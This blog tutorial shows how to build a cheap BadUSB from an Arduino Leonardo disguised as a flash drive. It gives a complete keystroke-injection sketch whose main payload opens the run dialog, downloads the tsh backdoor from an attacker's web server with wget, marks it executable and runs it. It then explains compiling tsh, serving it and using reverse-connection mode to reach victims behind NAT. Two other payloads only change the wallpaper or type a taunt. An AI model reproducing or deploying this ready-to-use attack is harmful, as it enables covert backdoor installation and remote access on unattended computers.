
Quacked

 ·  🎃 kr0m

BadUSBs have been in fashion since the appearance of the Rubber Ducky. That device interprets very simple scripts and injects keystrokes into the host. In this article we will build a BadUSB without scripting capabilities, which gives us more control because we use Arduino’s keyboard libraries directly. It will also cost us $5 instead of the $45 asked for the Rubber Ducky.

The first step is to get the right hardware: an Arduino Leonardo inside a metal case that looks like a USB flash drive. It can be bought on AliExpress for the modest price of $5:

AliExpress - BadUsb

The next step is to download the Arduino IDE:
https://www.arduino.cc/en/Main/Software

Next, the keyboard library with support for the Spanish layout:

cd ArduinoDIRECTORY/libraries/
git clone https://github.com/ernesto-xload/arduino_keyboardlib.git

vi arduino_keyboardlib/src/Keyboard.h

#define kbd_es_es

With all of this in place we are ready to go. As an example, take this sketch:

// https://www.arduino.cc/en/Reference/KeyboardModifiers

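// Payload selectors for `platform` (see the switch in loop()).
// Enumerators instead of macros: same numeric values, but the names are real
// compile-time constants the compiler can check rather than textual substitutions.
enum {
  TSH = 0,
  WALLMATE = 1,
  AWESOME = 2
};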

#include "Keyboard.h"

// Selects which case of the switch in loop() runs: TSH, WALLMATE or AWESOME.
// Change it before flashing; nothing in this sketch modifies it at runtime.
int platform = TSH;

// Arduino setup(): runs once before loop(). Starts USB HID keyboard emulation so
// the later Keyboard.* calls are delivered to the host as keystrokes.
void setup() {
  Keyboard.begin();
}

// Arduino loop(): replays the keystroke sequence selected by `platform`, then
// spins forever so the sequence is not repeated.
// Everything below is plain USB HID keyboard input. There is no feedback channel
// from the host, so the delay() values are empirical pacing, not synchronisation:
// if the desktop is slower than expected, keystrokes land in the wrong window.
// From the host's point of view this device is indistinguishable from a keyboard
// being typed on; the controls that address this class of device are USB device
// allow-listing and not leaving an unlocked session unattended.
void loop() {
  // Give the host OS time to enumerate the HID keyboard before typing.
  delay(3000);

  switch (platform) {
    case TSH:
      // Open the desktop's run-command dialog with Alt+F2: hold Alt, tap F2,
      // release Alt, 100 ms between events.
      // NOTE(review): Alt+F2 as a run dialog is desktop-specific (MATE is implied
      // by the gsettings schema used in the WALLMATE case) — confirm for the
      // environment this sketch is written for.
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      // Type the wget command that fetches tshd from the web server started with
      // the command in the next comment; the IP and port are those of the serving
      // machine in this write-up.
      // RX4 ~/tsh-0.6> python -m SimpleHTTPServer 8888
      Keyboard.print("wget 192.168.20.114:8888/tshd -O /tmp/tshd");
      // Eight Tab presses (i runs 0..7 inclusive) — presumably moves the dialog
      // focus to its run button before Enter; the count is empirical. TODO confirm.
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      // Wait for the command to finish before opening the dialog again.
      delay(2000);
      
      // Same Alt+F2 dance, then mark the downloaded file executable.
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("chmod 777 /tmp/tshd");
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);
      
      // Same Alt+F2 dance, then run the downloaded binary.
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("/tmp/tshd");
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);
      
      break;
    case WALLMATE:
      // Open the run dialog (Alt+F2, as above) and download an image to /tmp.
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("wget https://i.imgflip.com/1dv8ac.jpg -O /tmp/quacked.jpg");
      delay(1000);
      // Alternative dialog navigation (two Tabs then Space) kept commented out
      // for reference; the eight-Tab variant below is the one in use.
      /*for (int i=0; i <= 1; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.write(' ');*/
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);

      // Open the run dialog again and point the MATE desktop background at the
      // downloaded image via gsettings.
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("gsettings set org.mate.background picture-filename '/tmp/quacked.jpg'");
      delay(1000);
      // Same commented-out alternative as above.
      /*for (int i=0; i <= 1; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.write(' ');*/
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      
      break;
    case AWESOME:
      // Hold the Super/GUI key while tapping Enter (write() is press+release),
      // wait a second, release everything, then type a message into whatever
      // window took focus. NOTE(review): the shortcut's effect depends on the
      // window manager (the case name suggests awesome) — unverified here.
      // This is the last case, so no break is needed; add one if more cases are
      // appended below.
      Keyboard.press(KEY_LEFT_GUI);
      Keyboard.write(KEY_RETURN);
      delay(1000);
      Keyboard.releaseAll();
      Keyboard.print("You have been Kr0med!!");
  }

  // Spin forever: the Arduino runtime would otherwise call loop() again and
  // replay the whole sequence.
  while (true);
}

Depending on the selected payload, the USB performs different actions. For the tsh payload, tsh must be compiled beforehand and a web server started so that wget can download the binary:

wget https://packetstormsecurity.com/files/download/31650/tsh-0.6.tgz
tar xvzf tsh-0.6.tgz
cd tsh-0.6
make linux

We start the web server:

python -m SimpleHTTPServer 8888

Now, when the binary is downloaded, an entry will appear in the console where we launched the web server, allowing us to connect with the victim. If the victim is behind a NAT, this obviously won’t work. What we can do is compile tsh in “reverse connection” mode so that it will be the victim who connects with us, bypassing the NAT.
